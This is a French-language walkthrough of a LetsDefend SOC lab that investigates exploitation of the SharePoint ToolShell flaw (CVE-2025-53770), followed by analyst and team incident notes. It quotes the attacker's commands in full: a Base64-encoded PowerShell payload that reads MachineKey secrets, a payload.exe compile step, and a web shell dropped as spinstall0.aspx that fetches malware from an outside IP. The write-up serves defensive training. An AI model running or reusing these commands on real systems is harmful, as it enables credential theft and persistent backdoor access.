
Guide pas à pas de l'exploitation de CVE-2025-53770 (ToolShell) dans un lab LetsDefend, couvrant le RCE, le déploiement de web shell et l'analyse de réponse aux incidents.
TL;DR Yo, dans ce lab LetsDefend, j'ai plongé dans un zero-day SharePoint appelé ToolShell (CVE-2025-53770). En gros, j'ai reproduit une attaque réelle où une requête POST malveillante contournait l'authentification, exécutait PowerShell pour voler les clés MachineKeySection, compilait payload.exe et déposait un web shell (spinstall0.aspx). J'ai tout journalisé, analysé le comportement et contenu l'hôte. Ce README couvre l'attaque, mes étapes et les leçons apprises.
Aperçu du lab
Outils utilisés :
Windows PowerShell
VirusTotal
AbuseIPDB
Gestion des journaux LetsDefend
Sécurité des endpoints LetsDefend
Renseignement sur les menaces LetsDefend


EventID : 320
Heure de l'événement : Jul, 22, 2025, 01:07 PM
Règle : SOC342 - CVE‑2025‑53770 SharePoint ToolShell Contournement d'authentification et RCE
Niveau : Analyste de sécurité
Nom d'hôte : SharePoint01
Adresse IP source : 107.191.58.76
Adresse IP de destination : 172.16.20.17
Méthode de requête HTTP : POST
URL demandée : /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer : /_layouts/SignOut.aspx
Content-Length : 7699
Raison du déclenchement de l'alerte : Requête POST non authentifiée suspecte ciblant ToolPane.aspx avec une charge utile de grande taille et un referer usurpé indiquant une exploitation de CVE-2025-53770.
Action de l'appareil : Autorisée
Vue d'ensemble Le 22 juillet 2025, notre surveillance de sécurité a signalé une attaque zero-day critique ciblant une instance de SharePoint sur site nommée SharePoint01.
Détails de la CVE :
Catalogue KEV de la CISA : Entrée publiée le 20 juillet 2025
Vecteur d'attaque : Requête POST vers le point de terminaison /ToolPane.aspx, en-tête referer usurpé, charge utile malveillante de grande taille
Source : IP 107.191.58.76, Vultr Holdings, LLC, États-Unis
À propos de SharePoint Microsoft SharePoint est le socle de la collaboration d'entreprise et de la gestion documentaire. C'est essentiellement un espace sécurisé et organisé, de type cloud, pour les fichiers, les flux de travail et les applications internes.
Principales utilisations :
Gestion documentaire : Versioning, pistes d'audit, contrôle des fichiers
Collaboration : Plusieurs utilisateurs modifiant le même document simultanément
Portails web internes : Actualités, mises à jour, informations RH, politiques
Flux de travail automatisés : Approbations, formulaires, notifications
Intégration : Étroitement lié à Teams, Outlook, la suite Office, Power BI
Considérations de sécurité :
Authentification : AD ou SSO
Chiffrement : Données au repos et en transit
Web Parts et layouts : Peuvent être exploités en cas de mauvaise configuration
Gestion des correctifs : Essentielle pour prévenir les attaques zero-day
CVE-2025-53770, également appelée ToolShell, est un zero-day SharePoint exploité dans la nature. C'est une vulnérabilité critique de désérialisation dans les serveurs Microsoft SharePoint sur site qui permet l'exécution de code à distance (RCE) sans authentification. Elle s'associe à d'autres failles SharePoint (CVE-2025-49704 et CVE-2025-49706) pour compromettre entièrement les systèmes. Elle a un score CVSS de 9,8, ce qui signifie qu'elle est critique.
Ils téléchargent des web shells malveillants comme spinstall0.aspx via le point de terminaison ToolPane.aspx en utilisant des en-têtes referer usurpés pour contourner l'authentification.
Ils extraient des valeurs MachineKey critiques de la configuration SharePoint afin de générer des charges utiles ViewState de confiance pour un accès persistant.
puis déploient plus tard des rançongiciels (par exemple, la souche « Warlock ») ou exfiltrent des identifiants et installent des backdoors.
Première divulgation publique : 19 juillet 2025 (blog Microsoft)
Correctifs publiés : 20–21 juillet 2025
Entrée dans le catalogue KEV de la CISA : 20 juillet 2025
J'ai analysé l'adresse IP de l'expéditeur (adresse IP source) sur VirusTotal.
Adresse IP source : 107.191.58.76

À partir de là, je sais déjà que l'IP est malveillante.
Je dois maintenant rechercher la localisation de l'IP à l'aide d'AbuseIPDB.

Voici ce que j'ai obtenu :
ISP Vultr Holdings, LLC
Type d'utilisation - Data Center/Hébergement Web/Transit
ASN - AS20473
Nom(s) d'hôte - 107.191.58.76.vultrusercontent.com
Nom de domaine - vultr.com
Pays - États-Unis d'Amérique
Ville - Los Angeles, Californie
IP connue pour piratage, force brute, attaque d'application web, scan de ports, empoisonnement DNS
En tant qu'analyste junior, voici comment j'ai procédé. J'ai d'abord recherché l'hôte sur la sécurité des endpoints avec le nom « SharePoint01 ».

Après avoir localisé l'hôte, je suis allé dans l'historique du terminal et j'ai trouvé une ligne de commande :

Que fait cette commande ?
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
→ Lance PowerShell directement depuis le répertoire système.
-nop
→ Aucun profil — ignore les scripts de profil PowerShell pour éviter la détection ou les interférences.
-w hidden
→ S'exécute avec une fenêtre masquée afin que l'utilisateur ne la voie pas.
-e
Décodons ceci :
"PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg=="
Laissez-moi expliquer ce que fait le script ci-dessus.
Il importe :
-System.Diagnostics
-System.IO
⦁ puis exécute un script C# en ligne dans PowerShell qui :
-Charge les assemblys System.Web
-Accède à System.Web.Configuration.MachineKeySection
-Récupère les clés de validation et de déchiffrement depuis le web.config de la machine
-Les écrit ensuite dans la réponse, probablement pour les exfiltrer vers un attaquant.
L'attaquant a ensuite continué en envoyant cette commande :
""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs"
-csc.exe - un compilateur C# avec le framework .NET
-puis demande au compilateur d'enregistrer ce « payload.exe » sur l'hôte
cette charge utile pourrait être un logiciel malveillant.
Commande suivante de l'attaquant :
""C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"
Ce qu'elle fait :
"C:\Windows\System32\cmd.exe" /c -
Exécute la commande suivante dans l'invite de commandes, puis se termine.
echo <form runat=\"server\"> ... </form> -
Écrit un petit morceau de balisage ASP.NET qui s'exécutera sur le serveur SharePoint.
Le balisage contient :
<object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"> -
Ce CLSID est le contrôle ActiveX Shell (utilisé pour exécuter des commandes shell ou effectuer des actions spéciales dans un contexte IE/COM).
<param name="Command" value="Redirect"> -
Indique à l'objet quelle action effectuer.
<param name="Url" value="http://107.191.58.76/payload.exe"> -
Pointe vers un EXE malveillant hébergé sur un serveur distant — très probablement leur véritable malware.
Commande suivante de l'attaquant :
""C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"
Encore une fois, ce qu'elle fait :
"C:\Windows\System32\cmd.exe" /c -
Exécute la commande suivante dans l'invite de commandes, puis se termine.
echo <form runat=\"server\"> ... </form> -
Écrit un petit morceau de balisage ASP.NET qui s'exécutera sur le serveur SharePoint.
Et aussi
Le balisage contient :
<object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">
Ce CLSID est le contrôle ActiveX Shell (utilisé pour exécuter des commandes shell ou effectuer des actions spéciales dans un contexte IE/COM).
<param name="Command" value="Redirect"> -
Indique à l'objet quelle action effectuer.
<param name="Url" value="http://107.191.58.76/payload.exe"> -
Pointe vers un EXE malveillant hébergé sur un serveur distant — très probablement leur véritable malware.
> C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx -
Enregistre tout cet objet HTML/ASP.NET malveillant sous le nom spinstall0.aspx dans le dossier layouts de SharePoint.
Tout ce qui se trouve dans ce dossier est accessible en accédant à la bonne URL sur le site SharePoint, ce qui signifie que l'attaquant dispose désormais d'une page web sur votre serveur qui déclenche l'action malveillante.
Les lignes de commande que j'ai trouvées sont ci-dessous :


Après avoir confirmé que c'était risqué, j'ai exploré les processus sur l'hôte.
Ça semblait suspect, grouillant de nombreux chemins de fichiers et d'exe.
Par curiosité, je suis allé dans la gestion des journaux et j'ai recherché l'IP malveillante dans les logs.
J'ai vu un journal brut avec une requête POST :
avec un referer - /_layouts/SignOut.aspx
Je suis ensuite allé vérifier si l'attaque avait réussi.
Vous savez quoi ? Oui. J'ai donc dû la contenir pour le SOC2.
Voici ma note d'analyste :
Nous avons repéré une attaque critique exploitant une vulnérabilité zero-day appelée ToolShell (CVE-2025-53770) sur un serveur SharePoint sur site nommé SharePoint01. L'attaquant, depuis une IP malveillante connue (107.191.58.76), a envoyé une requête POST non authentifiée avec une énorme charge utile vers un point de terminaison SharePoint (ToolPane.aspx), contournant l'authentification pour exécuter du code à distance sur le serveur.
En creusant plus profondément, l'attaquant a exécuté des commandes PowerShell masquées qui décodaient des scripts Base64 afin de voler des valeurs MachineKey sensibles de SharePoint, ce qui lui a permis de fabriquer des charges utiles de confiance. Il a compilé un exécutable malveillant sur l'hôte, puis a déposé un web shell (spinstall0.aspx) dans le dossier layouts de SharePoint qui télécharge et exécute un malware depuis son serveur, offrant un accès backdoor persistant.
Après avoir confirmé la compromission, nous avons contenu l'hôte affecté et recommandé un correctif immédiat, car les correctifs avaient été publiés quelques jours plus tôt à peine. Nous recherchons également d'autres web shells, surveillons toute activité de rançongiciel ou de vol de données, et recommandons un renforcement de la sécurité autour des serveurs SharePoint pour éviter d'autres dommages.
Et la note à l'équipe :
Note à l'équipe : Salut l'équipe, nous avons détecté une exploitation critique du zero-day ToolShell (CVE-2025-53770) sur notre serveur SharePoint (SharePoint01). Un attaquant a utilisé une requête POST non authentifiée pour contourner l'authentification et exécuter du code à distance, en commençant par une charge utile suspecte de grande taille ciblant ToolPane.aspx.
L'attaquant a exécuté des commandes PowerShell masquées pour voler des clés machine SharePoint sensibles, puis a compilé et déposé un exécutable malveillant sur le système. Il a également créé un web shell (spinstall0.aspx) dans le dossier layouts de SharePoint, qui télécharge et exécute un malware depuis un serveur externe, lui donnant potentiellement un contrôle persistant.
Nous avons contenu l'hôte compromis et recommandons un correctif urgent, car les correctifs viennent tout juste d'être publiés. Nous recherchons également des web shells similaires et surveillons les signes de rançongiciel ou d'exfiltration de données. Restons vigilants et renforçons la sécurité de SharePoint à l'avenir.
Voici mon résultat
